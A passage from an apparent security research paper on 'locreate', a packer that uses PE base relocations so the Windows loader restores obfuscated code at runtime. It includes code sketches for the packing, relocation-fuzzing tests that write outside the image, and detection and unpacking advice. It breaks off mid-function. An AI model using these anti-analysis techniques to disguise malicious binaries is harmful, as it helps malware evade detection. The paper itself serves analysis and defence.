that does not use any custom code to unpack binaries at execution time. This
|
||||
is different from typical packers which generally rely on packed executables
|
||||
containing code that is used to perform the inverse of the packing operation
|
||||
at runtime. Instead of depending on custom code, the technique described in
|
||||
this paper uses documented behavior of the dynamic loader as a mechanism for
|
||||
performing the unpacking operation. This difference can make binaries packed
|
||||
using this technique more difficult to signature and analyze, but only when
|
||||
presented to an untrained eye. The description of this technique is meant to
|
||||
be an example of a fun thought exercise and not as some sort of revolutionary
|
||||
packer. In fact, it's been used in the virus world many years prior to this
|
||||
paper.
|
||||
|
||||
Thanks: The author would like to thank Skywing, spoonm, deft,
|
||||
intropy, Orlando Padilla, nemo, Richard Johnson, Rolf Rolles, Derek Soeder,
|
||||
and Andre Protas for their discussions and feedback.
|
||||
|
||||
Challenge: Prior to reading this paper, the author recommends that
|
||||
the reader attempt to determine the behavior of the packer that was used on
|
||||
the binary included in the attached code sample. The binary itself is
|
||||
innocuous and just performs a few simple printf operations.
|
||||
|
||||
Previous Research: This technique has been used in the virus world far in
|
||||
advance of this writing. Examples that apply this technique include
|
||||
W95/Resurrel and W95/Silcer. Further research indicates that Peter Szor did a
|
||||
write-up on this technique entitled ``Tricky Relocations'' in the April 2001
|
||||
edition of Virus Bulletin[2,3].
|
||||
|
||||
2) Locreate
|
||||
|
||||
Executable packers, such as UPX, are commonly employed by malware as a means
|
||||
of delaying or otherwise thwarting the process of static analysis. Packers
|
||||
also have perfectly legitimate uses, but these uses fall outside of the scope
|
||||
of this paper. The reason packers make static analysis more difficult is
|
||||
because they alter the form of the binary to the point that what appears on
|
||||
disk is entirely different from what actually ends up executing in memory.
|
||||
This alteration is typically accomplished by encapsulating a pre-existing
|
||||
binary in a ``host'' binary. The algorithm used to encapsulate the
|
||||
pre-existing binary in the host binary is what differs from one packer to the
|
||||
next. In most cases, the host binary must contain code that will perform the
|
||||
inverse of the packing operation in order to decapsulate the original binary.
|
||||
The code that is responsible for performing this operation is typically
|
||||
referred to as an unpacker. The process of unpacking the original binary is
|
||||
usually done entirely in memory without writing the original version out to
|
||||
disk. Once the original binary is unpacked, execution control is transferred
|
||||
to the original binary which begins executing as if nothing had changed.
|
||||
|
||||
This general approach represents an easy way of altering the form of a binary
|
||||
without changing its effective behavior. In fact, it's pretty much analogous
|
||||
to payload encoders that are used in conjunction with exploits to alter the
|
||||
form of a payload in order to satisfy some character restrictions without
|
||||
changing the payload's effective behavior. In the case of payload encoders,
|
||||
some arbitrary code must be prefixed to the encoded payload in order to
|
||||
perform the inverse of the encoding operation once the payload is executed.
|
||||
However, like payload encoders, the use of custom code to perform the inverse
|
||||
of the packing or encoding operation can lead to a few problems.
|
||||
|
||||
The most apparent of these problems has to do with the fact that while the
|
||||
packed form of an executable may be entirely different from its original, the
|
||||
code used to perform the unpacking operation may be static. In the event that
|
||||
the unpacker consists of static code, either in whole or in part, it may be
|
||||
possible to signature or otherwise identify that a particular packing
|
||||
algorithm has been used to produce a binary and thus make it easier to restore
|
||||
the original form of the binary. This ability is especially important when it
|
||||
comes to attempting to heuristically identify malware prior to allowing a user
|
||||
to execute it.
|
||||
|
||||
The use of custom code can also make it possible for tools to be developed
|
||||
that attempt to identify unpackers based on their behavior. Ero Carrera has
|
||||
provided some excellent illustrations relating to the feasibility of this type
|
||||
of attack against unpackers[1]. An understanding of an unpacker's behavior may
|
||||
also make it possible to acquire the original binary without allowing it to
|
||||
actually execute by simply tracing the unpacker up until the point where it
|
||||
transfers execution control to the original binary. In the case of malware,
|
||||
this weakness means that benefits gained from packing an executable can be
|
||||
completely nullified.
|
||||
|
||||
Both of these problems are meant to illustrate that even though custom unpacking
|
||||
code is often a requirement, its mere presence exposes a potential point of
|
||||
weakness. If it were possible to eliminate the custom code required to unpack
|
||||
a binary, it could make the two problems described previously much more difficult
|
||||
to realize. To that point, the technique described in this paper does not
|
||||
rely on the presence of custom code in a packed binary in order to unpack
|
||||
itself. Instead, documented behavior of the dynamic loader is used to perform
|
||||
the unpacking whenever the packed binary is executed. While this approach has
|
||||
its benefits, there are a number of problems with it that will be discussed
|
||||
later on. In the interest of brevity, the packer described in this paper will
|
||||
simply be referred to as locreate. As was already mentioned,
|
||||
locreate leverages a documented feature of most dynamic loaders in order to
|
||||
perform its unpacking operation. Given that the process of unpacking
|
||||
typically involves transforming the original binary's contents back into its
|
||||
original form, there are only a finite number of dynamic loader features that
|
||||
might be abused. Perhaps the feature that is best suited for transforming the
|
||||
contents of a binary at runtime is the dynamic loader feature that was
|
||||
designed to do just that: relocations.
|
||||
|
||||
In the event that a binary is unable to be loaded at its preferred base
|
||||
address at runtime, the dynamic loader is responsible for attempting to move
|
||||
the binary to another location in memory. The act of moving a binary from its
|
||||
preferred base address to a new base address is more commonly referred to as
|
||||
relocating. When a binary is relocated to a new base address, any references
|
||||
the binary might have to addresses that are relative to its preferred base
|
||||
address will no longer be valid. As such, references that are relative to the
|
||||
preferred base address must be updated by the dynamic loader in order to make
|
||||
them relative to the new base address. Of course, this presupposes that the
|
||||
dynamic loader has some knowledge of where in the binary these address
|
||||
references are made. To satisfy this presupposition, binaries will typically
|
||||
include relocation information to provide the dynamic loader with a map to the
|
||||
locations within the binary that need to be adjusted. When a binary does not
|
||||
include relocation information, it's classified as a non-relocatable binary.
|
||||
Without relocation information, a binary cannot be relocated to an alternate
|
||||
base address in an elegant manner (ignoring position independent executables).
|
||||
|
||||
The structures used to convey relocation information differ from one binary
|
||||
format to the next. For the purpose of this paper, only the structures used
|
||||
to describe relocations of Portable Executable (PE) binaries will be
|
||||
discussed. However, it should be noted that the approaches described in this
|
||||
paper should be equally applicable to other binary formats, such as ELF. In
|
||||
fact, other binary formats make the technique used by locreate even easier.
|
||||
For example, ELF supports applying relocation fixups with an addend. This
|
||||
addend is basically an arbitrary value that is used in conjunction with a
|
||||
transformation. The PE binary format conveys relocation information through
|
||||
one of the data directories that is included within the optional header
|
||||
portion of the NT header. This data directory is symbolically referred to
|
||||
through the IMAGE_DIRECTORY_ENTRY_BASERELOC constant. The base relocation
|
||||
data directory consists of zero or more IMAGE_BASE_RELOCATION structures which
|
||||
are defined as:
|
||||
|
||||
typedef struct _IMAGE_BASE_RELOCATION {
|
||||
ULONG VirtualAddress;
|
||||
ULONG SizeOfBlock;
|
||||
// USHORT TypeOffset[1];
|
||||
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
|
||||
|
||||
The base relocation data directory is a little bit different from most other
|
||||
data directories. The IMAGE_BASE_RELOCATION structures embedded in the data
|
||||
directory do not occur immediately one after the other. Instead, there are a
|
||||
variable number of USHORT sized fixup descriptors that separate each
|
||||
structure. The SizeOfBlock attribute of each structure describes the entire
|
||||
size of a relocation block. Each relocation block consists of the base
|
||||
relocation structure and the variable number of fixup descriptors. Therefore,
|
||||
enumeration of the base relocation data directory is best performed by using
|
||||
the SizeOfBlock attribute of each structure to proceed to the next relocation
|
||||
block until none are remaining. The VirtualAddress attribute of each
|
||||
relocation block is a page-aligned relative virtual address (RVA) that is used
|
||||
as the base address when processing its associated fixup descriptors. In this
|
||||
manner, each relocation block describes the relocations that should be applied
|
||||
to exactly one page.
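
The enumeration described above can be sketched as follows. This is a
minimal illustration rather than the code used by locreate: the
reloc_block_header type is a stand-in for IMAGE_BASE_RELOCATION that uses
fixed-width types so it compiles without the Windows headers, the name
walk_reloc_blocks is hypothetical, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for IMAGE_BASE_RELOCATION using fixed-width types. */
typedef struct {
    uint32_t VirtualAddress; /* page-aligned RVA the block applies to */
    uint32_t SizeOfBlock;    /* header plus all fixup descriptors, in bytes */
} reloc_block_header;

/* Walk a raw base relocation directory and return the number of blocks
 * seen. The total number of 16-bit fixup descriptors is stored in *fixups.
 * The walk stops early if a block claims an impossible size. */
size_t walk_reloc_blocks(const uint8_t *dir, size_t dir_size, size_t *fixups)
{
    size_t offset = 0, blocks = 0;

    assert(dir != NULL && fixups != NULL);
    *fixups = 0;

    while (dir_size - offset >= sizeof(reloc_block_header)) {
        reloc_block_header hdr;
        memcpy(&hdr, dir + offset, sizeof(hdr));

        /* A block must at least hold its header and must fit in the
         * remaining directory bytes. */
        if (hdr.SizeOfBlock < sizeof(hdr) ||
            hdr.SizeOfBlock > dir_size - offset)
            break;

        *fixups += (hdr.SizeOfBlock - sizeof(hdr)) / sizeof(uint16_t);
        blocks++;
        offset += hdr.SizeOfBlock; /* SizeOfBlock leads to the next block */
    }
    return blocks;
}
```

The size checks are an addition for robustness; they keep a malformed
SizeOfBlock from causing an endless loop or a read past the directory.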
|
||||
|
||||
The fixup descriptors contained within a relocation block describe the address
|
||||
of the value that should be transformed and the method that should be used to
|
||||
transform it. The PE format describes about 10 different transformations that
|
||||
can be used to fixup an address reference. These transformations are conveyed
|
||||
through the top 4 bits of each fixup descriptor. The bottom 12 bits are used
|
||||
to describe the offset into the VirtualAddress of the containing relocation
|
||||
block. Adding the bottom 12 bits of a fixup descriptor to the VirtualAddress
|
||||
of a relocation block produces the RVA that contains a value that needs to be
|
||||
transformed. Of the transformation methods that exist, the one most commonly
|
||||
used on x86 is IMAGE_REL_BASED_HIGHLOW, or 3. This transformation dictates that
|
||||
the 32-bit displacement between the original base address and the new base
|
||||
address should be added to the value that exists at the RVA described by the
|
||||
fixup descriptor. The act of adding the displacement means that the value
|
||||
will be transformed to make it relative to the new base address rather than
|
||||
the original base address. To better understand how all of these things tie
|
||||
together, consider the following source code example:
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
printf("Hello World.\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
When compiled down, this function appears as the following:
|
||||
|
||||
sample!main:
|
||||
00401010 55 push ebp
|
||||
00401011 8bec mov ebp,esp
|
||||
00401013 6800104200 push offset sample!__rtc_tzz <PERF> (sample+0x21000) (00421000)
|
||||
00401018 e80c000000 call sample!printf (00401029)
|
||||
0040101d 83c404 add esp,4
|
||||
00401020 33c0 xor eax,eax
|
||||
00401022 5d pop ebp
|
||||
00401023 c3 ret
|
||||
|
||||
At address 0x00401013, main pushes the address of the string that contains
|
||||
``Hello World.'':
|
||||
|
||||
0:000> db 00421000 L 10
|
||||
00421000 48 65 6c 6c 6f 20 57 6f-72 6c 64 2e 0a 00 00 00 Hello World.....
|
||||
|
||||
In this case, the push instruction is referring to the string using an
|
||||
absolute address. If the sample executable must be relocated at runtime, the
|
||||
dynamic loader must be provided with the relocation information necessary to
|
||||
fixup the reference to the absolute address. The dumpbin.exe utility from
|
||||
Visual Studio can be used to confirm that this information exists. The first
|
||||
requirement is that the binary must have relocation information. By default,
|
||||
all DLLs will contain relocation information, but executables typically do
|
||||
not. Executables can be compiled with relocation information by using the
|
||||
/fixed:no linker flag. When a binary is compiled with relocations, the
|
||||
presence of relocation information is simply indicated by a non-zero
|
||||
VirtualAddress and Size for the base relocation data directory. These values
|
||||
can be determined through dumpbin.exe /headers:
|
||||
|
||||
26000 [ EE8] RVA [size] of Base Relocation Directory
|
||||
|
||||
Since relocation information must be present at runtime, there should also be
|
||||
a section, typically named .reloc, that contains the virtual mapping
|
||||
information for the relocation information:
|
||||
|
||||
SECTION HEADER #5
|
||||
.reloc name
|
||||
1165 virtual size
|
||||
26000 virtual address (00426000 to 00427164)
|
||||
2000 size of raw data
|
||||
24000 file pointer to raw data (00024000 to 00025FFF)
|
||||
0 file pointer to relocation table
|
||||
0 file pointer to line numbers
|
||||
0 number of relocations
|
||||
0 number of line numbers
|
||||
42000040 flags
|
||||
Initialized Data
|
||||
Discardable
|
||||
Read Only
|
||||
|
||||
In order to validate that this executable contains relocation information for
|
||||
the absolute address reference made to the ``Hello World.'' string, the
|
||||
dumpbin.exe /relocations command can be used:
|
||||
|
||||
File Type: EXECUTABLE IMAGE
|
||||
|
||||
BASE RELOCATIONS #5
|
||||
1000 RVA, A8 SizeOfBlock
|
||||
14 HIGHLOW 00421000
|
||||
2C HIGHLOW 00420350
|
||||
...
|
||||
|
||||
This output shows the first relocation block which describes the RVA 0x1000.
|
||||
Each line below the relocation block header describes the individual fixup
|
||||
descriptors. The information displayed includes the offset into the page, the
|
||||
type of transformation being performed, and the current value at that location
|
||||
in the binary. From the disassembly above, the location of the address
|
||||
reference that is being made is 0x00401014. Therefore, the very first fixup
|
||||
in this relocation block provides the dynamic loader with the information
|
||||
necessary to change the address reference to the new base address when the
|
||||
binary is relocated. If this binary were to be relocated to 0x50000000, the
|
||||
HIGHLOW transformation would be applied to 0x00401014 as follows. The
|
||||
displacement between the new base address and the old address would be
|
||||
calculated as 0x50000000 - 0x00400000, or 0x4fc00000. Adding 0x4fc00000 to
|
||||
the existing value of 0x00421000 produces 0x50021000 which is subsequently
|
||||
stored in 0x00401014. This causes the absolute address reference to become
|
||||
relative to the new base address.
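
The worked example above can be expressed as a small sketch. It is not
the loader's actual implementation; the function names are hypothetical,
the image is modeled as a flat byte buffer indexed by RVA, and a
little-endian host is assumed. Only the HIGHLOW transformation is
handled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_BASED_HIGHLOW 3u /* value of IMAGE_REL_BASED_HIGHLOW */

/* Upper 4 bits of a fixup descriptor: the transformation type. */
unsigned fixup_type(uint16_t desc)   { return (unsigned)desc >> 12; }

/* Lower 12 bits: offset into the page named by VirtualAddress. */
unsigned fixup_offset(uint16_t desc) { return desc & 0x0fffu; }

/* Apply one HIGHLOW fixup to a mapped image by adding the 32-bit
 * displacement between the new and old base to the value stored at
 * block_rva + offset. Returns 0 on success, -1 if the descriptor is not
 * HIGHLOW or the target falls outside the image. */
int apply_highlow(uint8_t *image, size_t image_size, uint32_t block_rva,
                  uint16_t desc, uint32_t old_base, uint32_t new_base)
{
    uint32_t value;
    size_t rva = (size_t)block_rva + fixup_offset(desc);

    assert(image != NULL);
    if (fixup_type(desc) != REL_BASED_HIGHLOW)
        return -1;
    if (rva + sizeof(value) > image_size)
        return -1;

    memcpy(&value, image + rva, sizeof(value));
    value += new_base - old_base; /* wraps modulo 2^32 */
    memcpy(image + rva, &value, sizeof(value));
    return 0;
}
```

For the example in the text, the descriptor 0x3014 in the block for RVA
0x1000 decodes to type 3 and offset 0x14, and relocating from 0x00400000
to 0x50000000 turns the stored 0x00421000 into 0x50021000.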
|
||||
|
||||
Based on this basic understanding of how relocations are processed, it's now
|
||||
possible to describe how a packer can be implemented that takes advantage of
|
||||
the way the dynamic loader processes relocation information. As has been
|
||||
illustrated above, relocation information is designed to make it possible to
|
||||
fixup absolute address references at runtime when a binary is relocated.
|
||||
These fixups are applied by taking into account the displacement between the
|
||||
new base address and the original base address. More often than not, this
|
||||
displacement isn't known ahead of time, thus making it impossible to reliably
|
||||
predict how the content at a specific location in the binary will be altered.
|
||||
But what if it were possible to deterministically know the displacement in
|
||||
advance? Knowing the displacement in advance would make it possible to alter
|
||||
various locations of the binary in a manner that would permit the original
|
||||
values to be restored by relocations at runtime. In effect, the on-disk
|
||||
version of the binary could be made to appear quite different from the
|
||||
in-memory version at runtime. This is the basic concept behind locreate.
|
||||
|
||||
In order for locreate to work it must be possible to predict the displacement
|
||||
reliably. Since the displacement is calculated in relation to the preferred
|
||||
base address and the expected base address, both values must be known.
|
||||
Furthermore, the binary must be relocated every time it executes in order for
|
||||
the relocations to be applied. As it happens, both of these problems can be
|
||||
solved at once. Since a binary is only guaranteed to be relocated if its
|
||||
preferred base address is in conflict with an existing address, a preferred
|
||||
base address must be selected that will always lead to a conflict. This can
|
||||
be accomplished by setting the preferred base address to any invalid user-mode
|
||||
address (any address at or above 0x80000000). This assumes that the machine
|
||||
that the executable will run on is not running with /3GB. If it is, a higher
|
||||
address would have to be used. Alternatively, the base address can be set to
|
||||
SharedUserData which is guaranteed to be located at 0x7ffe0000 in every
|
||||
process. Setting the binary's preferred base address to any of these
|
||||
addresses will force it to be relocated every time it executes. The only
|
||||
unknown is what address the binary is expected to be relocated to.
|
||||
|
||||
Determining the address that will be relocated to depends on the state of the
|
||||
process' address space at the time that the binary is relocated. If the
|
||||
binary that's being relocated is an executable, then the process' address
|
||||
space is generally in a pristine state since the executable is one of the
|
||||
first things to be mapped into the address space. As such, the first
|
||||
available address will always be 0x10000 on default installations of Windows.
|
||||
If the binary is a DLL, it's hard to predict what the state of the address
|
||||
space will be in all cases. When a conflict does occur, the kernel searches
|
||||
for an available address region by traversing from lowest to highest address.
|
||||
For the purposes of this paper, it will be assumed that an executable is being
|
||||
packed and that the address being relocated to is 0x10000. Further research
|
||||
may provide insight into how to better control or alter the expected base
|
||||
address.
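
Under the assumptions stated above (a preferred base that always
conflicts and an expected base of 0x10000), the displacement can be
computed ahead of time. The sketch below is illustrative; reloc_delta is
a hypothetical helper, and the subtraction is done modulo 2^32 to match
32-bit HIGHLOW fixups.

```c
#include <assert.h>
#include <stdint.h>

/* Displacement the loader adds for each HIGHLOW fixup: the expected
 * (actual) base minus the preferred base, modulo 2^32. Both bases are
 * assumed to be aligned on a 64KB boundary. */
uint32_t reloc_delta(uint32_t preferred_base, uint32_t expected_base)
{
    assert((preferred_base & 0xffffu) == 0);
    assert((expected_base & 0xffffu) == 0);
    return expected_base - preferred_base;
}
```

A preferred base of 0x80000000 with an expected base of 0x10000 gives a
displacement of 0x80010000; using SharedUserData at 0x7ffe0000 instead
gives 0x80030000. In both cases the low 16 bits of the displacement are
zero.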
|
||||
|
||||
With both the preferred base address and the expected base address known, the
|
||||
only thing that remains is to perform the operations that will transform the
|
||||
on-disk version of the binary in a manner that causes custom relocations to
|
||||
restore the binary to its original form at runtime. This process can be both
|
||||
simplistic and complicated. The simplest approach would be to enumerate over
|
||||
the contents of each section in the binary, altering the value at each
|
||||
location by subtracting the displacement and then creating a relocation fixup
|
||||
descriptor that will ensure that the contents are restored to the expected
|
||||
value at runtime. This is how the proof of concept works. A more complicated
|
||||
approach would be to create multiple relocation fixup descriptors per-address.
|
||||
This would mean that the displacement would need to be subtracted once for
|
||||
each fixup descriptor. It should also be possible to apply relocations to
|
||||
individual bytes within a four byte span rather than applying relocations in
|
||||
four byte increments. Even more interesting would be to use some fixup types
|
||||
other than HIGHLOW, although this could be seen as something that might make
|
||||
generating a signature easier.
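The simplest approach described above can be sketched as follows. This is an illustrative model rather than the proof of concept's code: the function names are assumptions, only a single page is handled (so every offset fits in the 12-bit field of a fixup descriptor), fixups are placed at non-overlapping four byte increments, and trailing bytes that do not fill a full dword are left untouched.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_BASED_HIGHLOW 3u

/* Host byte order is used for both directions, so the round trip is exact. */
uint32_t get32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
void put32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Subtract the displacement from each dword in the page and emit one HIGHLOW
 * fixup per dword. The caller must provide room for len / 4 fixups.
 * Returns the number of fixups written. */
size_t pack_page(uint8_t *page, size_t len, uint32_t delta, uint16_t *fixups)
{
    size_t count = 0;
    for (size_t off = 0; off + 4 <= len && off < 0x1000; off += 4) {
        put32(page + off, get32(page + off) - delta);
        fixups[count++] = (uint16_t)((REL_BASED_HIGHLOW << 12) | (unsigned)off);
    }
    return count;
}

/* What the loader effectively does at runtime: add the displacement back
 * at every HIGHLOW fixup. */
void unpack_page(uint8_t *page, uint32_t delta, const uint16_t *fixups, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        if ((fixups[i] >> 12) != REL_BASED_HIGHLOW)
            continue;
        size_t off = fixups[i] & 0x0fffu;
        put32(page + off, get32(page + off) + delta);
    }
}
```

Packing a page and then applying the generated fixups with the same displacement yields the original bytes, which is the property the technique depends on.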
|
||||
|
||||
The end result of this whole process is a functional proof of concept that
|
||||
packs a binary in the manner described above. To get a feel for how different
|
||||
the binary looks after being packed, consider what the implementation of main
|
||||
from earlier in this paper looks like. Notice how the first two instructions
|
||||
are the same as they were previously. This has to do with the fact that base
|
||||
addresses must align on 64KB boundaries, and thus the lower two bytes are
|
||||
not changed. This could be improved further, for example through the strategies
|
||||
described above:
|
||||
|
||||
.text:84011000 loc_84011000:
|
||||
.text:84011000 push ebp
|
||||
.text:84011001 mov ebp, esp
|
||||
.text:84011003 in al, dx
|
||||
.text:84011004 add [eax+0], dh
|
||||
.text:84011006 add [edi+edi*8+1209C15h], eax
|
||||
.text:8401100D test [ebx-3FCCFB3Ch], al
|
||||
.text:84011013 loope near ptr 84010FD8h
|
||||
.text:84011015
|
||||
.text:84011015 loc_84011015:
|
||||
.text:84011015 push (offset off_8401139C+1)
|
||||
|
||||
The locreate proof of concept has been tested on Windows XP and Windows 2003
|
||||
Server. Initial testing on Windows Vista indicates that Vista does not
|
||||
properly alter the entry point address after relocations have been applied
|
||||
when an executable is packed. Even though the proof of concept implementation
|
||||
works, there are a number of more fundamental problems with the technique
|
||||
itself.
|
||||
|
||||
The first set of problems has to do with techniques that can be used to
|
||||
signature locreate packed executables. Since locreate relies on injecting a
|
||||
large number of relocation fixups, it may be possible to heuristically detect
|
||||
an increased number of relocation fixups relative to the size of
|
||||
individual segments. This particular attack could be solved by decreasing the
|
||||
number of relocation fixups injected by locreate. This would have the effect
|
||||
of only partially mangling the binary, but it might be enough to make people
|
||||
wonder what's going on without giving things away. Even if it weren't
|
||||
possible to heuristically detect an increased number of relocation fixups,
|
||||
it's definitely possible to detect the fact that an executable packed by
|
||||
locreate will have an invalid preferred base address that will always result
|
||||
in a conflict. This fact alone makes it mostly trivial to at least detect
|
||||
that something odd is going on.
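Both detection ideas can be expressed as a simple heuristic. The sketch below is hypothetical: the function names are made up for illustration, the 50 percent density threshold is an arbitrary assumption rather than a measured value, and the base address check assumes a 32-bit system that is not booted with /3GB.

```c
#include <stddef.h>
#include <stdint.h>

/* A preferred base at or above 0x80000000, or equal to SharedUserData at
 * 0x7ffe0000, can never be honored and always forces relocation. */
int base_always_conflicts(uint32_t image_base)
{
    return image_base >= 0x80000000u || image_base == 0x7ffe0000u;
}

/* Fixups per dword of section data, expressed as a percentage. */
unsigned fixup_density_percent(size_t fixup_count, size_t section_bytes)
{
    if (section_bytes < 4)
        return 0;
    return (unsigned)((fixup_count * 100u) / (section_bytes / 4u));
}

/* Flag an image if either signal is present. The threshold is an
 * illustrative assumption, not a tuned value. */
int looks_locreate_packed(uint32_t image_base, size_t fixup_count, size_t section_bytes)
{
    return base_always_conflicts(image_base) ||
           fixup_density_percent(fixup_count, section_bytes) >= 50u;
}
```

A section in which nearly every dword carries a fixup would score close to 100 percent, whereas ordinary compiled code would be expected to score far lower.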
|
||||
|
||||
Detection is only the first problem, however. Once a locreate packed
|
||||
executable has been detected, the next logical step is to attempt to figure
|
||||
out some way of obtaining the original executable. Since locreate relies on
|
||||
relocation fixups to do this, the only thing one would have to do in order to
|
||||
obtain the original binary would be to relocate the executable to the expected
|
||||
base address that was used when the binary was packed, such as 0x10000. While
|
||||
it's trivial to develop tools to perform this action, the Interactive
|
||||
Disassembler (IDA) already supports it. When opening an executable, the
|
||||
``Manual Load'' checkbox can be toggled. This will cause IDA to prompt the
|
||||
user to enter the base address that the binary should be loaded at. When the
|
||||
base address is entered, IDA processes relocations and presents the relocated
|
||||
binary image. The mitigating factor here is that the user must know the
|
||||
expected base address, otherwise the binary will still appear completely
|
||||
mangled when it's relocated to the wrong base address.
|
||||
|
||||
In the author's opinion, these problems make locreate a sub-par packer. At
|
||||
best it should be viewed as an interesting approach to the problem of packing
|
||||
executables, but it should not be relied upon as a means of thwarting static
|
||||
analysis. Anyone who reads this paper will have the tools necessary to unpack
|
||||
executables that have been packed by locreate. With that said, it should be
|
||||
noted that there is still an opportunity for further research that could help
|
||||
to identify ways of improving locreate. For instance, a better understanding
|
||||
of differences in the way the dynamic loader and existing static analysis
|
||||
tools process relocation fixups could provide some opportunity for
|
||||
improvement. Results from some of the author's initial tests of these ideas
|
||||
are included in Appendix A. Here's a brief list of some differences that could
|
||||
exist:
|
||||
|
||||
1. Different behaviors when processing fixups
|
||||
|
||||
It's possible that the dynamic loader and static analysis tools such as IDA
|
||||
may not support the same set of fixup types. Furthermore, they may not
|
||||
process fixup types in the same way. If differences do exist, it may be
|
||||
possible to create a packed executable that will work correctly when used
|
||||
against the dynamic loader but not render properly when relocated using a
|
||||
static analysis tool such as IDA.
|
||||
|
||||
2. Relocation blocks with non-page-aligned VirtualAddress fields
|
||||
|
||||
It's unknown whether or not the dynamic loader and static analysis tools are
|
||||
able to properly handle relocation blocks that have non-page-aligned
|
||||
VirtualAddress fields. In all normal circumstances, VirtualAddress will be
|
||||
page aligned.
|
||||
|
||||
3. Relocation blocks that modify other relocation blocks
|
||||
|
||||
An interesting situation that may lead to differences between the dynamic
|
||||
loader and static analysis tools has to do with relocation blocks that modify
|
||||
other relocation blocks. In this way, the relocation information that exists
|
||||
on disk is not what is actually used, in its entirety, when relocating an
|
||||
image during runtime.
|
||||
|
||||
Even if research into these topics doesn't yield any direct improvements to
|
||||
locreate, it should nonetheless provide some interesting insight into the way
|
||||
that different applications handle relocation processing. And after all,
|
||||
gaining knowledge is what it's really all about.
|
||||
|
||||
Appendix A) Differences in Relocation Processing
|
||||
|
||||
This appendix attempts to describe some tests that were run on different
|
||||
applications that process relocation entries for binary files. Identifying
|
||||
differences may make it possible to have a binary that will work correctly
|
||||
when executed but not when analyzed by a static analysis tool such as IDA. To
|
||||
test out these ideas, the author threw together a small relocation fuzzing
|
||||
tool that is aptly named relocfuzz. This tool will take a pre-existing binary
|
||||
and create a new one with custom relocations. The code for this tool can be
|
||||
found in the other code associated with this paper.
|
||||
|
||||
The tests included in this appendix were performed against three different
|
||||
applications: the dynamic loader (ntdll.dll), IDA, and dumpbin. If the same
|
||||
tests are run against other applications, the author would be interested in
|
||||
knowing the results.
|
||||
|
||||
A.1) Non-page-aligned Block VirtualAddress
|
||||
|
||||
In all normal cases, relocation blocks will be created with a page-aligned
|
||||
VirtualAddress. However, it's unclear if non-page-aligned VirtualAddress
|
||||
fields will be handled correctly when relocations are processed. There are
|
||||
some interesting implications of non-page-aligned VirtualAddress fields. In many
|
||||
applications, such as the dynamic loader, it's critical that addresses
|
||||
referenced through RVAs are validated so as to prevent references being made
|
||||
to external addresses. For example, if relocations were processed in
|
||||
kernel-mode, it would be critical that checks be performed to ensure that RVAs
|
||||
don't end up making it possible to reference kernel-mode addresses. The
|
||||
reason non-page-aligned VirtualAddress fields are interesting is that they
|
||||
leave open the possibility of this type of attack.
|
||||
|
||||
Consider the scenario of a binary that is relocated to 0x7ffe0000, ignoring
|
||||
for the moment that SharedUserData already exists at this location. Now,
|
||||
consider that this binary has a relocation block with a virtual address of
|
||||
0x1ffff. This address is not page-aligned. Now, consider that this
|
||||
relocation block has a fixup descriptor that indicates that at offset 0x4 into
|
||||
this page, a certain type of fixup should be performed. This would equate to
|
||||
modifying memory at 0x80000003, a kernel-mode address. If relocations were
|
||||
being processed in kernel-mode, like they are on Windows Vista for ASLR, then
|
||||
a failure to validate the actual address being written to would result in a
|
||||
dangerous condition.
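The address arithmetic in this scenario, and the kind of check that would catch it, can be sketched as follows. The names are illustrative assumptions, and the user-mode limit of 0x80000000 assumes a 32-bit system without /3GB. The sum is computed in 64 bits so that it cannot wrap.

```c
#include <stdint.h>

#define USER_MODE_LIMIT 0x80000000ull  /* assumption: 32-bit, no /3GB */

/* Address that a fixup descriptor refers to: load base, plus the block's
 * VirtualAddress, plus the 12-bit offset stored in the descriptor. */
uint64_t fixup_target(uint32_t load_base, uint32_t block_rva, uint16_t fixup)
{
    return (uint64_t)load_base + block_rva + (fixup & 0x0fffu);
}

/* Non-zero if a write of `width` bytes at the target stays entirely below
 * the user-mode limit. */
int fixup_target_is_user_mode(uint32_t load_base, uint32_t block_rva,
                              uint16_t fixup, unsigned width)
{
    return fixup_target(load_base, block_rva, fixup) + width <= USER_MODE_LIMIT;
}
```

With a load base of 0x7ffe0000, a block VirtualAddress of 0x1ffff, and an offset of 0x4, the target is 0x80000003, which the check rejects.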
|
||||
|
||||
Here's an example of some code that attempts to test out this idea:
|
||||
|
||||
static VOID TestNonPageAlignedBlocks(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT KillerBlock = AllocateRelocationBlockContext(1);
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
KillerBlock);
|
||||
|
||||
KillerBlock->Rva = 0x10001;
|
||||
KillerBlock->Fixups[0] = (3 << 12) | 0;
|
||||
}
|
||||
|
||||
In this example, a custom relocation block is created with one fixup
|
||||
descriptor. The VirtualAddress associated with the block is set to 0x10001
|
||||
and the first fixup descriptor is set to modify offset 0 into that RVA. If
|
||||
the binary that is hosting these relocations is relocated to 0x10000, a write
|
||||
should occur to 0x20001 when processing the relocations. Here are the results
|
||||
from a few initial tests:
|
||||
|
||||
ntdll.dll: The relocation fixup is processed and results in a write
|
||||
to 0x20001.
|
||||
|
||||
IDA: Ignores the relocation fixup, but only because it writes outside of the
|
||||
executable from what it would appear.
|
||||
|
||||
dumpbin.exe: Parses the relocation block without issue.
|
||||
|
||||
A.2) Writing to External Addresses
|
||||
|
||||
Due to the fact that the VirtualAddress associated with each relocation block
|
||||
is a 32-bit RVA, it is possible to create relocation blocks that have RVAs
|
||||
that actually reside outside of the mapped executable that is being relocated.
|
||||
This is important because if steps aren't taken to detect this scenario, the
|
||||
application processing the relocation fixups might be tricked into writing to
|
||||
memory that is external to the mapped binary. Creating a test-case for this
|
||||
example is trivial:
|
||||
|
||||
static VOID CreateExternalWriteRelocationBlock(
|
||||
__in PPE_IMAGE Image,
|
